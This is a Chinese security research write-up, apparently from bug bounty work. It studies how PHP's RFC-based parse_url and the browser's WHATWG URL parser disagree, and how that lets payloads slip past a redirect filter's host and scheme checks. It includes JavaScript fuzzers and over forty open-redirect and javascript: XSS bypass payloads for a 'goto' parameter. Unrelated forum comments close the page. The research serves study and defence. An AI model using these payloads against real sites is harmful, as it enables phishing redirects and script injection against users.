对WHATWG URL标准与RFC URL标准不一致性的研究

2022年8月份在挖天融信SRC的时候，发现天融信的某个站点使用了redacted系统，于是便在github上下载了redacted的源码，审计了一下。

Source & Sink

通过审计发现，redacted系统在多处使用goto 参数来实现页面的重定向，比如说登录功能:

http://demo.redacted.com/login?goto=/

已经登录的用户如果访问该URL，后端将会读取goto参数的值，将其填充到twig模板中的div标签的自定义属性data-goto中:

{% block content %}
<div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
  <div class="page-message-panel">
    <div class="page-message-heading">
      <h2 class="page-message-title">{{ title|trans }}</h2>
    </div>
    <div class="page-message-body">{{ message|default('')|trans|raw }}</div>
  </div>
</div>
{% endblock %}

之后前端通过如下js代码读取data-goto属性的值，通过window.location.href实现页面的跳转:

function (e, t) {
        var n = $("#page-message-container"),
            r = n.data("goto"),
            o = n.data("duration");
        o > 0 && r && setTimeout((function () {
            window.location.href = r
        }), o)
 }

Sanitizer/Filter

redacted为了防止在页面重定向的过程中出现开放重定向漏洞（OR）和XSS ，专门在后端写了一个过滤器，对goto参数中的URL进行过滤:

    /**
     * 过滤URL.
     *
     * 如果url不属于非本站域名下的，则返回本站首页地址。
     *
     * @param $url string 待过滤的$url
     *
     * @return string
     */
    public function filterRedirectUrl($url)
    {
        $host = $this->get('request_stack')->getCurrentRequest()->getHost();
        $safeHosts = [$host];

        $parsedUrl = parse_url($url);
        $isUnsafeHost = isset($parsedUrl['host']) && !in_array($parsedUrl['host'], $safeHosts);
        $isInvalidUrl = isset($parsedUrl['scheme']) && !in_array($parsedUrl['scheme'], ['http', 'https']);

        if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
            $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
        }

        return strip_tags($url);
    }

该 filter 的工作机制大致如下：
1. 拿到http请求报文中Host请求头，作为host白名单
2. 设置协议白名单: http,https
3. 使用PHP的URL解析器，来解析传入的URL，得到host部分和scheme部分
4. 如果host部分和scheme部分存在，就判断host部分是否属于host白名单，scheme部分是否属于scheme白名单
5. 否则就认为用户传入的是一个相对URL

绕过host检查

如何绕过filter的host检查呢？
我想到了之前用来绕过 SSRF filter 的一个payload ：

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/

这段payload 之所以可以成功，主要是利用了前后端URL解析器的不一致性：

PHP的parse_url认为URL的host部分是demo.redacted.com ，与http请求报文中Host请求一致，所以通过了检查,
但是js的URL解析器却并不这样认为: js 的URL解析器会将 \ 规范化为 / ，所以原来的payload 经过解析后就变成了:

http://baidu.com/@demo.redacted.com/

因此前端认为URL的host部分是baidu.com 。

> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

绕过scheme检查

仅仅绕过host检查，我们只能造成一个开放重定向漏洞，想要造成xss，还需要绕过后端的协议检查，如何绕过后端的协议检查呢？

我们可以尝试从如下思路来切入：因为漏洞的出现往往是由于程序的一些错误假设，所以我们可以尝试去寻找一下filter 有哪些错误的假设，然后尝试去打破它。

$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
    $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);

再次回看上面的那段filter代码，filter 假设：
1. 如果从URL中解析不到 host 和 scheme 部分，就一定是相对URL
2. "相对URL"一定就是安全的。

那么如果我们让parse_url返回false会怎么样？

false['host'] === NULL
false['scheme'] === NULL

parse_url 会认为用户传入的URL没有host和scheme部分，所以是一个相对URL!而相对URL一定是安全的，可以直接返回给前端。

如何让parse_url返回false呢？

PHP URL parser 只是对RFC标准的实现，所以一旦传入的URL不符合RFC规范，那么parse_url就会返回false

比如一个经典的payload ，便可以用一种更简单的方式造成开放重定向:

https://demo.redacted.com/login?goto=http:///baidu.com

RFC 1738 规定:层级结构的绝对URL 除去协议部分，后续部分必须以 // 开头

The scheme specific data start with a double slash "//" to indicate that it complies with the common Internet scheme syntax.

所以PHP 的URL解析器认为 http:///baidu.com 是一个非法的URL，因此直接返回了false，所以直接跳过了后续检查，返回给了前端。

但是前端的URL解析器并不这么认为,它会将http:///baidu.com 规范化为http://baidu.com :

> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

所以造成了OR 漏洞。

那么如果将http协议换成javascript 协议呢？RFC文档只是规定了层级URL必须包含//前缀，却没有明确说明: 如果非层级URL包含// 前缀，URL解析器应该如何处理。

javascript:alert(1)
javascript://alert(1)
mailto:happyhacking@qq.com 
mailto://happyhacking@qq.com

于是我便想到了如下payload:

https://demo.redacted.com/login?goto=javascript:///%250dalert(1)

PHP 的URL解析器认为 javascript:///%250dalert(1) 是一个非法URL，直接返回了false，所以filter 跳过了协议检查，直接认为这就是一个安全的”相对URL“ 。

但是前端的URL解析器有自己的想法：

这行payload 反射到前端后是这样的:

window.location.href = 'javascript:///%0dalert(1)'

前端的URL解析器先进行URL解码，将%0d解码为\n ,解析到的协议名为javascript，因此切换为了js 解析器，js 解析器则认为// 是单行注释符，alert(1) 是换行后的下一行js代码。

因此造成了XSS

进一步的研究

能不能通过编写fuzzer来进一步搜索到js URL解析器和php URL解析器的更多不一致性呢?

http:{char}//localhost:80/xxxx

我们能否在 http: 和 //之间找到一个字符，将该字符填充到{char}位置之后，前端URL解析器仍然认为URL的host部分是localhost呢?

fuzzer如下：

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http:'+String.fromCodePoint(i)+'//localhost:80/xxxx')
  if(url['host'] == 'localhost' ){
    console.log(i+':URL encoded i : '+encodeURI(String.fromCodePoint(i)))
    log.push(i);
  }
  }catch(e){}
}
log

前端URL解析器的运行结果:

9:  URL encoded i : %09 debugger eval code:7:13-> \t http:%09//localhost  
10:  URL encoded i : %0A debugger eval code:7:13-> http:%0a//localhost
13:  URL encoded i : %0D debugger eval code:7:13-> http:%0d//localhost
47:  URL encoded i : / debugger eval code:7:13 -> http:///localhost
92:  URL encoded i : %5C \ -> http:\//localhost

那么PHP的URL解析器是如何解析的呢？

 ["http:%09//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%09//localhost"
  }
  ["http:   //localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "   //localhost"
  }
  ["http:%0a//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%0a//localhost"
  }
  ["http:\//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(12) "\//localhost"
  }
  ["http:///localhost"]=>
  bool(false)

由此可见，PHP URL解析器面对这些payload的时候，要么会认为http:之后的都是path部分，要么直接认为该URL是一个非法的URL，从而返回了false

换句话说，以下payload 也可以绕过redacted 的filter ，导致开放重定向:

https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com

http{char}://localhost:80/xxxx

我们能否在 http 和 ://之间找到一个字符，加入该字符后仍然可以让前端URL解析器认为URL的host部分是localhost且scheme部分是http呢?

fuzzer:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http'+String.fromCodePoint(i)+'://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

前端URL解析器的运行结果:

VM437:7 9:  URL encoded i : %09
VM437:7 10:  URL encoded i : %0A
VM437:7 13:  URL encoded i : %0D

这次只得到了三个字符，没有了 / 和，得到如下3个payload

http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com

PHP的URL解析器是如何解析的呢?

  ["http%09://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%09://localhost:80/xxx"
  }
  ["http%0a://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0a://localhost:80/xxx"
  }
  ["http%0d://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0d://localhost:80/xxx"
  }

PHP 直接认为整个URL 都是path 部分，即认为整个URL就是一个相对URL

这样一来，同时绕过了filter的协议检查和host检查:

window.location.href='http\n://localhost:80/xxx' //成功！
window.location.href='javascript\n:alert(1)' //成功!
window.location.href='javascript\r:alert(1)' //成功！
window.location.href='javascript\t:alert(1)' //成功！

payload:

https://demo.redacted.com/login?goto=javascript%0d:alert(1) //成功！
https://demo.redacted.com/login?goto=javascript%0a:alert(1) //成功！
https://demo.redacted.com/login?goto=javascript%09:alert(1) //成功！
https://demo.redacted.com/login?goto=http%09://baidu.com //成功

{char}http://localhost:80/xxxx

能否在 http协议之前找到一个字符，填充进去后，仍然可以让前端URL解析器认为URL的host部分是localhost且scheme部分是http呢?

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL(String.fromCodePoint(i)+'http://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log(`i: ${i} ,URL encoded i : `+encodeURI(String.fromCodePoint(i))+' string begin:'+String.fromCodePoint(i)+'string end')
    log.push(i);
  }
  }catch(e){}
}
log
log.forEach(i=>{
    //console.log(encodeURI(String.fromCodePoint(i))+'http://localhost:80/xxxx')
    console.log(encodeURI(String.fromCodePoint(i))+'javascript:alert(1)')
})

生成了如下payload:

%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx

将http协议替换为javascript协议:

%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)

PHP 的URL解析器是如何解析的呢？

  ["%00http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%00http://localhost:80/xxxx"
  }
  ["%01http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%01http://localhost:80/xxxx"
  }
  ["%1Djavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Djavascript:alert(1)"
  }
  ["%1Ejavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Ejavascript:alert(1)"
  }

PHP 的URL解析器认为整个URL就是一个相对URL

所以以下payload 都可以绕过redacted filter 的协议检查和host检查:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)

ht{char}tp://localhost:80/xxxx

让我们的想法再大胆一点，能否在ht和tp之间找到一种字符，让前端的URL解析器仍然认为URL的scheme部分是http且host部分是localhost

fuzz 程序如下:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('ht'+String.fromCodePoint(i)+'tp://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

运行结果:

i: 9 URL encoded i : %09 debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 10 URL encoded i : %0A debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 13 URL encoded i : %0D debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
Array(3) [ 9, 10, 13 ]

得到了如下payload

ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)

那么PHP的URL解析器是如何处理这些畸形URL的呢?

  ["ht%0dtp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0dtp://localhost"
  }
  ["ht%0atp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0atp://localhost"
  }
  ["ht%09tp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%09tp://localhost"
  }
  ["java%09script:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%09script:alert(1)"
  }
  ["java%0dscript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0dscript:alert(1)"
  }
  ["java%0ascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0ascript:alert(1)"
  }

PHP 的URL解析器再一次地认为这些URL都是'规范的'相对URL，全部通过了redacted fitler的检查

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)

实际上这三种字符可以放在scheme的任意位置:

https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

汇总

通过对javascript URL parser 与php URL parser不一致性的进一步研究，我一共找到了四十几种绕过redacted filter 的方法：

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1) 
https://demo.redacted.com/login?goto=javascript%0a:alert(1) 
https://demo.redacted.com/login?goto=javascript%09:alert(1) 
https://demo.redacted.com/login?goto=http%09://baidu.com 
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

根本原因

为什么javascript URL parser与PHP URL parser之间存在这么大的不一致性?

因为这个世界上存在两种URL解析标准：RFC标准和WHATWG标准，WHATWG 组织在参考RFC标准的基础上，自己制定了一套标准: URL parsing

浏览器端javascript URL parser遵循了WHATWG标准，而PHP URL parser 遵循了RFC规范, Node.js 则同时提供了两种URL解析器，分别是 url.parse 和 new URL ，前者遵循RFC标准，后者遵循WHATWG标准。

WHATWG URL parsing 标准中规定:

If input contains any leading or trailing C0 control or space, validation error.

Remove any leading and trailing C0 control or space from input.

如果输入的URL开头和结尾有C0 控制符和space，则报一个 validtion error,然后删除输入中给所有开头和结尾的 C0 控制符和 space ，其中 C0 control 的范围是: 0x00-0x1F ,space 的范围是 0x20 ，所以C0 control + space的范围是 0x00-0x20

什么叫 validation error 呢？

A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere.A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.

validtion error 只是表示输入和有效输入之间的不匹配，并不意味着解析终止，标准鼓励实现者在某处报告它。

这就是为什么以下这些payload可以工作：

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)

该标准还规定：

If input contains any ASCII tab or newline, validation error.

Remove all ASCII tab or newline from input.

那么ASCII tab or newline 范围有多大?

An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.

所以下面这些payload中%0d %0a %09都会被javascript URL parser给删除掉

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

换句话说，%0d %0a %09 这三个字符可以放在URL的任何位置来对URL进行混淆，反正javascript URL parser 会删除掉这些字符,比如

new URL('http:/\x09/baidu.com') 

URL {
    origin: 'http://baidu.com', 
    protocol: 'http:', 
    username: '', 
    password: '', 
    host: 'baidu.com'
}

总结

世界上最糟糕的事莫过于对于同一事物有两套标准，如果标准存在不一致性，那么实现必然存在不一致性。不一致性导致的安全问题是隐蔽的，因为当你审计单个系统的时候，你会认为没有安全问题，但是当你把多个系统连接起来协同工作的时候，安全问题就会出现。这也说明了审计安全问题，需要从全局出发来统筹考虑，不能只是审计单个系统。

同时值得注意的是,凡是标准和规范没有明确规定或者模棱两可的地方，实现标准的开发者之间就会存在理解偏差，进而导致各种遵循标准实现的语言、库、框架、软件之间出现不一致性，这种不一致性便是创造新的攻击技术的沃土。

+----------------------------------------------------+
| 存在两套标准/标准的模棱两可/标准没有明确规定/标准的不同版本 |
+----------------------------------------------------+
                        |
                        v
              +-------------------+
              |  实现的不一致性     |
              +-------------------+
                        |
                        v
      +------------------------------------+
      |  各种bypass trick/新的攻击技术       |
      +------------------------------------+

	Yukong 🐮皮
H	HHHeey 好的，谢谢师傅的解答
	Article_kelp a类中的变量secret_class_var = "secret"是在merge
H	HHHeey secret_var = 1 def test(): pass
H	hgsmonkey tql！！！